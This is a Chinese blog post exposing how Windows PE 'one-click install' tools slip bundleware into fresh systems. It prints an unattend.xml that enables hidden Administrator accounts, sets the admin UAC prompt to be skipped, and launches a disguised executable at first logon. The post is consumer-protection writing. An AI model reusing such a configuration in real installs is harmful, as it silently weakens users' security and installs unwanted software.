现在百度搜索 “PE” “优盘”“装机”“一键装机”等都会弹出很多工具。什么老毛桃,深度,番茄花园等就更不用说了。
我试了下,这些确实方便了很多用户。却也藏了很多秘密。
比如我到 I tell you 下载了原版镜像。用这些搜索提到的工具,安装完系统。你会发现多了很多国产软件。而且你卸载后,还会死灰复燃。它自动又装上了。
那么你想知道他是怎么做到的吗?
其实它用到许多 Windows 自动部署的知识。比如这个文件 unattend.xml 。这个文件在系统解压后,你只需要在 Windows目录下新建一个 Pather 的文件夹 ,然后把它放进去,重启进行安装的时候,他会按这个文件的要求自动部署,非常方便。以下是老毛桃 PE 里面自带的工具解压系统映像后生成的。
<?xml version="1.0" encoding="utf-8"?> <unattend xmlns="urn:schemas-microsoft-com:unattend"> <settings pass="specialize"> <component name="Microsoft-Windows-Deployment" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <RunSynchronous> <RunSynchronousCommand wcm:action="add"> <Order>1</Order> <Path>cmd /c net user Administrator /active:yes</Path> <Description>EnableAdmin</Description> </RunSynchronousCommand> <RunSynchronousCommand wcm:action="add"> <Order>2</Order> <Path>cmd /c net user Administrator_ploc /active:yes</Path> <Description>EnableAdmin_ploc</Description> </RunSynchronousCommand> <RunSynchronousCommand wcm:action="add"> <Order>3</Order> <Path>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f</Path> <Description>UnConsentPromptBehaviorAdmin</Description> </RunSynchronousCommand> <RunSynchronousCommand wcm:action="add"> <Order>4</Order> <Path>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /d 1 /f</Path> <Description>FilterAdministratorToken</Description> </RunSynchronousCommand> </RunSynchronous> </component> </settings> <settings pass="oobeSystem"> <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <OOBE> <HideEULAPage>true</HideEULAPage> <HideWirelessSetupInOOBE>true</HideWirelessSetupInOOBE> <NetworkLocation>Work</NetworkLocation> <ProtectYourPC>2</ProtectYourPC> <SkipMachineOOBE>true</SkipMachineOOBE> <SkipUserOOBE>true</SkipUserOOBE> </OOBE> <RegisteredOrganization>P R C</RegisteredOrganization> <RegisteredOwner>Windows User</RegisteredOwner> <FirstLogonCommands> <SynchronousCommand wcm:action="add"> <CommandLine>%WinDir%\Vbjyqqada\Aelmrt.exe</CommandLine> <Description>Aelmrt</Description> <Order>1</Order> <RequiresUserInput>false</RequiresUserInput> </SynchronousCommand> </FirstLogonCommands> </component> </settings> </unattend>
你会发现他在最后有个执行 exe 的指令。这个就是系统安装完后会出现许多国产软件的根源所在。所以你在用它的PE释放系统镜像后,把这个指令删除,并把对应的目录删除即可。
我测试了下,他会安装360全家桶、爱奇艺、黄历、生成一些推广URL。可能还有其他的,我暂未发现。
为什么要这么偷偷摸摸做呢?因为这是一门生意。对用户不太友好的生意。本人也做过推广,每装一台电脑,这些软件联盟会结算推广费。大约每台可以收益五六块。量多的话,不敢想象。
所以还是那个道理。”免费才是最贵的!“
我已经卸载了。那他是怎么死灰复燃的呢?
这个其实是Windows激活造成的。你想啊!国内大部分都是盗版。那他是怎么激活系统的?
目前 Windows 7 一般通过引导激活。也就是模拟oem厂商的slic证书进行激活。
Windows 10 一般是 KMS 激活。KMS 激活就需要一个服务器。那这里可操作的就更多了。
KMS 激活的源代码是开源的。所以他可以编译成任何形式。他甚至可以成为一个肉鸡客户端。所以你会发现,你把恶意软件用杀毒干掉了,但是你电脑的激活也没了,甚至提示你盗版软件的受害者。既然是肉鸡客户端,那么他远程就可以操作你电脑安装任何他想推广的软件。如果这个激活客户端高明的话,一般的杀毒软件根本奈何不了他。
更有甚者,把它编译为EFI的话。他在你系统启动之前就加载了。当然你如果开启安全启动,可能会好很多。但至多也就是证书的问题。如果他的证书也经过了认证,那就真的很难防了。就不说这个,其实很多电脑的安全启动这个选项都是关闭的。
希望大家学会用Windows提供的方式来安装系统。不用那些PE工具了,当然我不是说全部。也有良心的,比如 优启通 。不要百度搜索,那结果都是假的。你要搜的话,搜 IT 天空。他也会修改一些东西,但远没其他PE那么难看。